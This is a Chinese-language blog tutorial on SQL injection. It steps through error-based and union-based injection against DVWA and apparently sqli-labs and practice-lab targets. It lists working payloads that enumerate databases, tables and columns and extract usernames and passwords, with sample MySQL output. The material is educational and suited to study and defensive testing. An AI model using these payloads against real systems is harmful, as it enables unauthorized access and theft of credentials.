注入流程教程

最新推荐文章于 2024-04-27 15:01:59 发布

InkTM

最新推荐文章于 2024-04-27 15:01:59 发布

阅读量388

点赞数 2

文章标签：网络安全 sql

本文链接：https://blog.csdn.net/qq_45564150/article/details/121653079

版权

Sql注入流程

1.判断是否有sql注入漏洞
2.判断操作系统，数据库和web应用的类型
3.获取数据库信息，包括管理员信息及托库
4.加密信息破解，sqlmap自动化破解
5.权限提升，获取Sql-shell Os-shell,登录应用后台。

基于错误的注入

错误注入的思路是通过构造特殊的sql语句，根据得到的错误的信息，确认sql注入点
通过数据库报错信息，也可以探测到数据库的类型和其他有用信息
通过输入单引号，触发数据库异常，通过异常日志判断数据库类型。

Mysql＞select first_name,last_name from dvwa.users.where user_id=' '

sql注入语句解析:’ or 1=1 – ’

mysql＞select first_name,last_name from dvwa.users.where user_id='     ' or 1=1 -- '     '

注释:
第一个 ’ 用于闭合前面的条件
or 1=1 为真的条件
– 将注释后面的所有语句
这种做法只能在当前网页上进行使用，而且查看的只是当前网页数据库相对所有的值。

基于union的注入

Union语句用于联合前面的select查询语句，合并查询更多信息；
一般通过错误和布尔注入确定注入点之后，便通过union语句获取有效信息。

' union select 1-- '
' union select 1,2-- '
' union select 1,2,3-- '
' union select 1,2,3,4-- '

我们构建的语句是在Url后面的id＝后面

Select first_name,last_name from dvwa.user_id=' ' union select 1-- ' '
Select first_name,last_name from dvwa.user_id=' ' union select 1,2-- ' '

获取当前数据库的及用户信息

'union select version(),database() --  '
'union select user(),database() --'

mysql> select first_name,last_name from dvwa.users where user_id=''union select version(),database()--'';
+------------------------+-----------+
| first_name             | last_name |
+------------------------+-----------+
| 5.1.41-3ubuntu12.6-log | NULL      |
+------------------------+-----------+
1 row in set (0.00 sec)

mysql> select first_name,last_name from dvwa.users where user_id=''union select user(),database()--'';
+----------------+-----------+
| first_name     | last_name |
+----------------+-----------+
| root@localhost | NULL      |
+----------------+-----------+
1 row in set (0.00 sec)

详解
version() 获得数据库版本信息
database() 获得当前数据库名
user() 获得当前用户名

必须注意当我们猜出字段的长度之后union语句前有几个字段union后面就要有几个字段。

select first_name,last_name from dvwa.users where user_id='union select table_schema,1 from information_schema.tables -- '

查询所有的库名

select first_name,last_name from dvwa.users where user_id='union select table_name,1 from information_schema.tables -- '

查所有的表名

select first_name,last_name from dvwa.users where user_id='union select table_schema,1 from information_schema.tables -- '

表名库名一起查询

select first_name,last_name from dvwa.users where user_id=''union select 1,column_name from information_schema.columns where table_name='users' -- ''

查询user表中的列名

'union select NULL, user from users -- '
'union select NULL,password from users --'
'union select user,password from users --'
'union select password, concat(frst_name,' ',last_name,' ',user) from users--'

手工注入

在页面寻找可以传参的地方，点进公告，看到?id=1,可以传参

219.153.49.228:41249/new_list.php?id=1'报错回显，存在注入
219.153.49.228:48930/new_list.php?id=1 and 1=1#正常显示
219.153.49.228:48930/new_list.php?id=1 and 1=2#异常回显
219.153.49.228:48930/new_list.php?id=1 order by 5#错误回显
219.153.49.228:48930/new_list.php?id=1%20order%20by%204#回显正常
219.153.49.228:48930/new_list.php?id=-1%20union%20select%201,2,3,4--+显示2,3回显
219.153.49.228:48930/new_list.php?id=-1 union select 1,database(),3,4 # 
219.153.49.228:48930/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() # 
219.153.49.228:48930/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name = "StormGroup_member" #
219.153.49.228:48930/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member #

爆数据库库名：http://180.21.88.239/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata #
爆数据表名：http://180.21.88.239/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema like 'security' #
爆字段值（列值）：http://180.21.88.239/Less-2/?id=-1 union select 1,2,group_concat(username,password) from  users #
获取数据：http://180.21.88.239/Less-2/?id=-1 union select 1,2,group_concat(username,password) from  users #

sql联合注入示例

		确认漏洞是否存在
			?id=1'
			?id=1' and 1=1--+
			?id=1' and 1=2--+
		确认字段数：
			?id=1' order by 5--+
			?id=1' order by 3--+
		确定回显为：
			?id=-1' union select 1,2,3 --+ 
		获取当前数据库：
			?id=-1' union select 1,2,database()--+
		获取表：
			?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
		获取列：
			?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
		获取数据：
			?id=-1' union select 1,2,group_concat(username,password) from users--+
		补充：
			获取所有数据库：
			?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+